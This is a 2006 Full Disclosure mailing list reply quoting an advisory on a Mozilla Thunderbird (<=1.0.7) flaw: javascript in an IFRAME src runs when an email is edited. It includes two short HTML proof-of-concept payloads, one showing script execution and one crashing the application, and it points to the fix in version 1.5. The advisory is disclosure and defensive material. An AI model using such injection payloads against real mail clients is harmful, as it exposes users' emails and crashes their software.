Full Disclosure mailing list archives
Re: Mozilla Thunderbird : Remote Code Execution & Denial of Service
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Wed, 22 Feb 2006 22:32:53 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 tu dois vraiment avoir rien à faire pour chercher des bugs dans une version perimée , loul :-> Renaud Lifchitz wrote:
Mozilla Thunderbird : Remote Code Execution & Denial of Service //----- Advisory Program : Mozilla Thunderbird Homepage : http://www.mozilla.com/thunderbird/ Tested version : <= 1.0.7 Found by : nono2357 at sysdream dot com This advisory : nono2357 at sysdream dot com Discovery date : 2006/01/28 //----- Application description Full-Featured Email Simple to use, powerful, and customizable, Thunderbird is a full-featured email application. Thunderbird supports IMAP and POP mail protocols, as well as HTML mail formatting. Easily import your existing email accounts and messages. Built-in RSS capabilities, powerful quick search, spell check as you type, global inbox, deleting attachments and advanced message filtering round out Thunderbird's modern feature set. //----- Description of vulnerability Thunderbird's WYSIWYG rendering engine insufficiently filters javascript scripts. It is possible to write javascript in the SRC attribute of the IFRAME tag. This leads to execution when the email is edited (for instance when replying to the email), even if javascript is disabled in the preferences. //----- Proof Of Concept * Javascript execution : <html> <body> <iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe> </body> </html> * Denial of service (application crash) : <html> <body> <iframe src="javascript:parent.document.write('Found by www.sysdream.com !')"></iframe> </body> </html> //----- Solution Upgrade to version 1.5. Download page : http://www.mozilla.com/thunderbird/all.html Direct link : http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/1.5/ //----- Impact Successful exploitation may lead to information disclosure (application version, platform, user emails, user preferences, ...) or could crash the application. //----- Credits http://www.sysdream.com nono2357 at sysdream dot com //----- Greetings crashfr & the hackademy ... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/zYha+LRXunxpxfAQLVJw/9ElEn3ACHtmNK07X5dQLWaV7Sj1bSg9TF i6eyhrvjFoqHRDFL+ZKPGS6Z9xSRV6SQ8fMruOwBHXaagcxyBFmPbtWA6OzUfYI3 sJKYWZiH0pEvdH9l5H5ZkxBrSZQ8mI+nKjR0D1thPSHPu0sNR5Oj+b4438SPoUif 0ZLN1UyxEIIPUS8pS42Bv2k6JKHl8cZ8q5D4k49u0gVP+Y0Gdz9D5w3mEDYbgSFC ROtIPuL9ARLN0MUeHYGIMhOfZefz5qP0GweNZDuK8dcJ9pyCc5gIvGeAK+Sa0cJ/ AY23GNwJQvcV3SRGfDaXergznAU5lg8NXq27z7wUzj/hmj11SS9rABLnKDFGZRj5 draGKg433VOCKJYwG7xH2xRkPrZOh4gbwn2/GLVU82702AsBsiWP5IRlGJ9K4uY0 A7pTgfBMGAgwcoouIqTxgrZd0pQPxgJ28TYg1DgdfACMp6wmU+8iWTKkivXcJIaT Qu33F+wZwS9jEE7ID3D14QCqlPfNg1drVpY3m/G6M08bCnxe1hyEOAIG141HIJUN gycXz4pNIP9gS6GhhG0epZKkIstYRjDOwwMFmu1MaR/O6u/wwX/gzED6S3LooVi1 OVmbpbwy3+Hv+mxcftomQcXUwv1lDMWlz2vjWDwdx9dpLlTvZI15CVk/jabUIEjL Tjzxv9mQu5w= =jhOg -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Mozilla Thunderbird : Remote Code Execution & Denial of Service Renaud Lifchitz (Feb 22)
- Re: Mozilla Thunderbird : Remote Code Execution & Denial of Service ad () heapoverflow com (Feb 22)